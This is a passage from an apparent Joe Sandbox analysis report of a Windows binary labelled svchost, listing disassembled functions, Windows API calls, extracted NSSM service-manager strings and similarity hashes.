FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00403CE5
GetStdHandle.KERNEL32(000000F5), ref: 00403CE9
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403D13
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403D24
GetStdHandle.KERNEL32(000000F5), ref: 00403D28
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403D52
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403D63
GetStdHandle.KERNEL32(000000F5), ref: 00403D67
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403D91
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403DA2
GetStdHandle.KERNEL32(000000F5), ref: 00403DA6
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00403DCA
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00403DDB
GetStdHandle.KERNEL32(000000F5), ref: 00403DDF
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403E06
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403E17
GetStdHandle.KERNEL32(000000F5), ref: 00403E1B
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403E42
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403E53
GetStdHandle.KERNEL32(000000F5), ref: 00403E57
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403E7E
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403E8F
GetStdHandle.KERNEL32(000000F5), ref: 00403E93
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403EBA
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403ECB
GetStdHandle.KERNEL32(000000F5), ref: 00403ECF
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403EF6
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403F07
GetStdHandle.KERNEL32(000000F5), ref: 00403F0B
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00403F35
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00403F46
GetStdHandle.KERNEL32(000000F5), ref: 00403F4A
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403F74
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403F85
GetStdHandle.KERNEL32(000000F5), ref: 00403F89
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403FB3
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403FC4
GetStdHandle.KERNEL32(000000F5), ref: 00403FC8
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403FF2
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404003
GetStdHandle.KERNEL32(000000F5), ref: 00404007
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404031
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404042
GetStdHandle.KERNEL32(000000F5), ref: 00404046
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00404070
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404081
GetStdHandle.KERNEL32(000000F5), ref: 00404085
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004040AF
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004040C0
GetStdHandle.KERNEL32(000000F5), ref: 004040C4
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 004040E8
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 004040F9
GetStdHandle.KERNEL32(000000F5), ref: 004040FD
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404124
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404135
GetStdHandle.KERNEL32(000000F5), ref: 00404139
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 00404160
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00404171
GetStdHandle.KERNEL32(000000F5), ref: 00404175
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040419C
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004041AD
GetStdHandle.KERNEL32(000000F5), ref: 004041B1
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004041D8
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004041E9
GetStdHandle.KERNEL32(000000F5), ref: 004041ED
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404214
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404225
GetStdHandle.KERNEL32(000000F5), ref: 00404229
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404250
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404261
GetStdHandle.KERNEL32(000000F5), ref: 00404265
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040428F
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004042A0
GetStdHandle.KERNEL32(000000F5), ref: 004042A4
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004042CE
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004042DF
GetStdHandle.KERNEL32(000000F5), ref: 004042E3
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040430D
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040431E
GetStdHandle.KERNEL32(000000F5), ref: 00404322
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040434C
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040435D
GetStdHandle.KERNEL32(000000F5), ref: 00404361
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040438B
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040439C
GetStdHandle.KERNEL32(000000F5), ref: 004043A0
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004043CA
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004043DB
GetStdHandle.KERNEL32(000000F5), ref: 004043DF
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00404409
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040441A
GetStdHandle.KERNEL32(000000F5), ref: 0040441E
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00404442
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00404453
GetStdHandle.KERNEL32(000000F5), ref: 00404457
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040447E
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040448F
GetStdHandle.KERNEL32(000000F5), ref: 00404493
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 004044BA
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 004044CB
GetStdHandle.KERNEL32(000000F5), ref: 004044CF
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004044F6
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404507
GetStdHandle.KERNEL32(000000F5), ref: 0040450B
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404532
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404543
GetStdHandle.KERNEL32(000000F5), ref: 00404547
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040456E
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040457F
GetStdHandle.KERNEL32(000000F5), ref: 00404583
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004045AA
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004045BB
GetStdHandle.KERNEL32(000000F5), ref: 004045BF
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004045E9
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004045FA
GetStdHandle.KERNEL32(000000F5), ref: 004045FE
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404628
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404639
GetStdHandle.KERNEL32(000000F5), ref: 0040463D
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404667
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404678
GetStdHandle.KERNEL32(000000F5), ref: 0040467C
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004046A6
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004046B7
GetStdHandle.KERNEL32(000000F5), ref: 004046BB
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004046E5
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004046F6
GetStdHandle.KERNEL32(000000F5), ref: 004046FA
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00404724
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404735
GetStdHandle.KERNEL32(000000F5), ref: 00404739
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404763
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404774
GetStdHandle.KERNEL32(000000F5), ref: 00404778
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004047A2
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004047B3
GetStdHandle.KERNEL32(000000F5), ref: 004047B7
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 004047DB
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 004047EC
GetStdHandle.KERNEL32(000000F5), ref: 004047F0
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 00404817
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404828
GetStdHandle.KERNEL32(000000F5), ref: 0040482C
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 00404853
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404864
GetStdHandle.KERNEL32(000000F5), ref: 00404868
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040488F
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004048A0
GetStdHandle.KERNEL32(000000F5), ref: 004048A4
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004048CE
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004048DF
GetStdHandle.KERNEL32(000000F5), ref: 004048E3
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000004,?,?), ref: 0040490D
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 0040491E
GetStdHandle.KERNEL32(000000F5), ref: 00404922
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040494C
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040495D
GetStdHandle.KERNEL32(000000F5), ref: 00404961
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040498B
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040499C
GetStdHandle.KERNEL32(000000F5), ref: 004049A0
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004049CA
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004049DB
GetStdHandle.KERNEL32(000000F5), ref: 004049DF
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00404A09
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00404A1A
GetStdHandle.KERNEL32(000000F5), ref: 00404A1E
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00404A48
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404A59
GetStdHandle.KERNEL32(000000F5), ref: 00404A5D
FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00404A81
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00404A92
GetStdHandle.KERNEL32(000000F5), ref: 00404A96
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404ABD
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404ACE
GetStdHandle.KERNEL32(000000F5), ref: 00404AD2
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404AF9
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404B0A
GetStdHandle.KERNEL32(000000F5), ref: 00404B0E
FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404B35
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404B46
GetStdHandle.KERNEL32(000000F5), ref: 00404B4A
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404B74
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404B85
GetStdHandle.KERNEL32(000000F5), ref: 00404B89
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00404BB3
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00404BC4
GetStdHandle.KERNEL32(000000F5), ref: 00404BC8
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00404BF2
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404C03
GetStdHandle.KERNEL32(000000F5), ref: 00404C07
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404C31
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404C42
GetStdHandle.KERNEL32(000000F5), ref: 00404C46
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00404C70
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404C81
GetStdHandle.KERNEL32(000000F5), ref: 00404C85
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404CAF
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404CC0
GetStdHandle.KERNEL32(000000F5), ref: 00404CC4
FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404CEE
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404CFB

Part of subcall function 00401A30: GetStdHandle.KERNEL32(000000F5), ref: 00401A35
Part of subcall function 00401A30: FillConsoleOutputAttribute.KERNELBASE(00000000,000000C0,?,?,?), ref: 00401A62
Part of subcall function 00401A30: FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,?,?,?,?,?,?), ref: 00401A72

Part of subcall function 00401AD0: GetStdHandle.KERNEL32(000000F5), ref: 00401AD5
Part of subcall function 00401AD0: FillConsoleOutputAttribute.KERNELBASE(00000000,00000000,?,?,?), ref: 00401AFF
Part of subcall function 00401AD0: FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,?,?,?,?,?,?), ref: 00401B0F

Part of subcall function 00401A80: GetStdHandle.KERNEL32(000000F5), ref: 00401A85
Part of subcall function 00401A80: FillConsoleOutputAttribute.KERNELBASE(00000000,00000040,?,?,?), ref: 00401AAF
Part of subcall function 00401A80: FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,?,?,?,?,?,?), ref: 00401ABF

Strings

NSSM, xrefs: 00401BE8
[%s] %s, xrefs: 00401BED

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Console$FillOutput$Handle$AttributeCharacter$MenuService__snwprintf_s$AllocCloseDisplayEnableItemManagerNameOpenSystemTitleWindow_memset
String ID: NSSM$[%s] %s
API String ID: 2807076079-2869788218
Opcode ID: 4633ee1047948a390348f6dda80a8a7e8cdc6cc0fbec7c961c1e38324070d8c3
Instruction ID: 0963313f467e621256798e3be32ce80b724b5108aba0c87ac21b87ba8057b7f0
Opcode Fuzzy Hash: 4633ee1047948a390348f6dda80a8a7e8cdc6cc0fbec7c961c1e38324070d8c3
Instruction Fuzzy Hash: 7473CB7125830A6EE210DF94DD41F6BB2EDEFD8B00F004A1DB655E72D1E6A4AD0887B7

Function 00409270 Relevance: 72.2, APIs: 33, Strings: 8, Instructions: 427
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,00000001,?,00000000,?,?,00000000), ref: 004092B5
GetLastError.KERNEL32(00000000), ref: 004092C3

Strings

AppStderr, xrefs: 0040964D
STD_OUTPUT_HANDLE, xrefs: 00409727
STD_ERROR_HANDLE, xrefs: 0040977C
stdout, xrefs: 00409435, 00409722
stdin, xrefs: 004096CD
AppStdout, xrefs: 0040943A, 004094F8
STD_INPUT_HANDLE, xrefs: 004096D2
stderr, xrefs: 004094F3, 00409648, 00409777

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: AppStderr$AppStdout$STD_ERROR_HANDLE$STD_INPUT_HANDLE$STD_OUTPUT_HANDLE$stderr$stdin$stdout
API String ID: 1214770103-1833172568
Opcode ID: 616819472e838b286589a2bbe120a1ed2100ae1f041291cb188454517c6769bf
Instruction ID: 6ae8fdd2871f227cf13b581f7b9c8d83ca64bc36ba86afe41948fee67ebde81e
Opcode Fuzzy Hash: 616819472e838b286589a2bbe120a1ed2100ae1f041291cb188454517c6769bf
Instruction Fuzzy Hash: 82E184F1940704ABD724DB75DC45FE773ACEB84308F40492EF65E93182E679A844CB69

Function 0040BEC0 Relevance: 70.5, APIs: 20, Strings: 20, Instructions: 510
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 0040BF4B

Strings

AppThrottle, xrefs: 0040C3C9
NSSM, xrefs: 0040C418
AppParameters, xrefs: 0040BF84, 0040BFA0
AppEnvironmentExtra, xrefs: 0040C1E4
AppRotateBytes, xrefs: 0040C2D7
AppRotateBytesHigh, xrefs: 0040C2FA
AppStopMethodThreads, xrefs: 0040C4C7
AppAffinity, xrefs: 0040C082
AppDirectory, xrefs: 0040BFD6, 0040C035, 0040C05E
AppEnvironment, xrefs: 0040C1CA
AppRotateSeconds, xrefs: 0040C2B4
AppStopMethodSkip, xrefs: 0040C3E9, 0040C41D, 0040C444
AppNoConsole, xrefs: 0040C31D
AppRotateOnline, xrefs: 0040C275
AppRestartDelay, xrefs: 0040C3AC
AppPriority, xrefs: 0040C1F7, 0040C229
Application, xrefs: 0040BF38
AppStopMethodWindow, xrefs: 0040C4AA
AppRotateFiles, xrefs: 0040C245
AppStopMethodConsole, xrefs: 0040C48D

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Close
String ID: AppAffinity$AppDirectory$AppEnvironment$AppEnvironmentExtra$AppNoConsole$AppParameters$AppPriority$AppRestartDelay$AppRotateBytes$AppRotateBytesHigh$AppRotateFiles$AppRotateOnline$AppRotateSeconds$AppStopMethodConsole$AppStopMethodSkip$AppStopMethodThreads$AppStopMethodWindow$AppThrottle$Application$NSSM
API String ID: 3535843008-3183881257
Opcode ID: 9d6ed601ee8fd9dcf12f7f88999e966fcfd8d83c6499986d4efbcf7daf40cfc1
Instruction ID: f5cea916ee1c04784f8007666e06431dbadbb17f458edc9d2949b720bf79e7c7
Opcode Fuzzy Hash: 9d6ed601ee8fd9dcf12f7f88999e966fcfd8d83c6499986d4efbcf7daf40cfc1
Instruction Fuzzy Hash: 0AF1BDF1544304BBE320AB618C86FFB7798EB85708F50492EF749A51C2E7BCA544C76A

Function 0040F580 Relevance: 38.8, APIs: 16, Strings: 6, Instructions: 344
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0040F5D8

Strings

%lu, xrefs: 0040F913, 0040F92E
NSSM, xrefs: 0040F94E
"%s" %s, xrefs: 0040F64F
D, xrefs: 0040F5E5
command line, xrefs: 0040F676
start_service, xrefs: 0040F671

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: _memset
String ID: "%s" %s$%lu$D$NSSM$command line$start_service
API String ID: 2102423945-3686305457
Opcode ID: 15bd790cc5130b0d5c2ab7dfe92f44a3908f88334305f7af3615e792483eadc3
Instruction ID: 8d8a3d24360daf10ba7eb9db1eca87cf74f697693d6f1518d53dda03d5ccb93b
Opcode Fuzzy Hash: 15bd790cc5130b0d5c2ab7dfe92f44a3908f88334305f7af3615e792483eadc3
Instruction Fuzzy Hash: BFC179F1A10700ABD720DB65DC46FDB73D8AB84308F40493EF69DA61C1E6BDA544CB69

Function 0040ACE0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 139
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,00000001,00000000), ref: 0040ACEC
HeapAlloc.KERNEL32(00000000), ref: 0040ACF3
_memset.LIBCMT ref: 0040AD2C
RegQueryValueExW.KERNELBASE ref: 0040AD57
GetLastError.KERNEL32 ref: 0040AD63
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AD6E
HeapFree.KERNEL32(00000000), ref: 0040AD75

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

get_string(), xrefs: 0040AD04

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$Event$ProcessSource$AllocDeregisterErrorFreeLastQueryRegisterReportValue_memset
String ID: get_string()
API String ID: 2603871056-896229945
Opcode ID: 56f8c6b17a97cf912f3af75bb16579b71339ad1f642ff53764c85366f89547bd
Instruction ID: 72e98944cf36b2bbc6af698ef9dc07420c8870f262d0e465f671d630dce17b03
Opcode Fuzzy Hash: 56f8c6b17a97cf912f3af75bb16579b71339ad1f642ff53764c85366f89547bd
Instruction Fuzzy Hash: 154115B19043006BE310AB58EC09FEB7B9CEF8471AF44457AF549A2182D7B9C954C6AB

Function 0040A860 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 101
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__snwprintf_s.LIBCMT ref: 0040A88E

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00020006,00000000,00000000,00000000,00409EC9), ref: 0040A8EB
GetLastError.KERNEL32(00000000), ref: 0040A8F7

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

EventMessageFile, xrefs: 0040A97E
NSSM, xrefs: 0040A878
create_messages(), xrefs: 0040A89C
SYSTEM\CurrentControlSet\Services\EventLog\Application\%s, xrefs: 0040A87D
TypesSupported, xrefs: 0040A995
eventlog registry, xrefs: 0040A8A1

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$CreateDeregisterErrorLastRegisterReport__snwprintf_s__vsnwprintf_s_l
String ID: EventMessageFile$NSSM$SYSTEM\CurrentControlSet\Services\EventLog\Application\%s$TypesSupported$create_messages()$eventlog registry
API String ID: 508490100-129066941
Opcode ID: 38dc869d80ae876ed19f88e43e9c7c4997b2ce9d1b33560f508c1b5226a0dd81
Instruction ID: 189017753002612d24ec776b8254467aa4e8da1510a31d32c64f91d8f6ef9f68
Opcode Fuzzy Hash: 38dc869d80ae876ed19f88e43e9c7c4997b2ce9d1b33560f508c1b5226a0dd81
Instruction Fuzzy Hash: 0A31CAF1A443006BE210E754CC47FEB7394EB88B08F50452EB659971C2F6F8A5848796

Function 0040AB70 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,00000000,?,?,?,0040C1D6,?,00000000,AppEnvironment,?,?), ref: 0040AB95
